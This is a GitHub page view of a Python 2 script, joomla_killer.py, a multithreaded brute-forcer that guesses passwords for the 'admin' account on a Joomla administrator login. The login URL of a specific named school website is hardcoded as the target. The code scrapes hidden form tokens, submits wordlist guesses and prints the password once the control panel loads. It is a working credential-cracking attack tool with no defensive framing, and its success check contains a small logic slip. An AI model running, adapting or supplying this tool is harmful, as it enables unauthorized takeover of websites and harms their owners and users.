-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathjoomla_killer.py
182 lines (120 loc) · 4.55 KB
/
joomla_killer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
#general settings
user_thread = 5
username= "admin"
wordlist_file = "./cain.txt"
resume = None
# target specific settings
target_url = "http://schooloftomorrow-edu.com/administrator/index.php"
target_post = "http://schooloftomorrow-edu.com/administrator/index.php"
username_field = "username"
password_field = "passwd"
success_check = "Administrator - Control Panel"
def build_wordlist(wordlist_file):
#read the wordlist file
fd = open(wordlist_file, "rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming word list from: %s"%resume
else:
words.put(word)
return words
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print "Finished setting up for: %s"%username
def run_bruteforce(self):
for i in range(user_thread):
t= threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
while True:
try :
response = opener.open(target_url)
page = response.read()
break
except Exception, e:
print "Caught", e
print "Retrying"
print "Trying: %s : %s (%d left)"%(self.username, brute, self.password_q.qsize())
# parse out the hidden fields
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add out username and password fields
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.urlencode(post_tags)
try :
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
except urllib2.HTTPError, e:
print e
login_result=""
#if "Username and password do not match or you do not have an account yet." not in login_result:
#print login_result
if "Configuration" and "Users" in login_result:
self.found = True
print "[*] Bruteforce successful"
print "[*] Username: %s" %username
print "[*] Password: %s"%brute
print "[*] Waiting for other threads to exit..."
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
tag_value = None
for name, value in attrs:
if name == "name":
tag_name = value
if name == "value":
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = value
def build_wordlist(wordlist_file):
#read the wordlist file
fd = open(wordlist_file, "rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming word list from: %s"%resume
else:
words.put(word)
return words
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()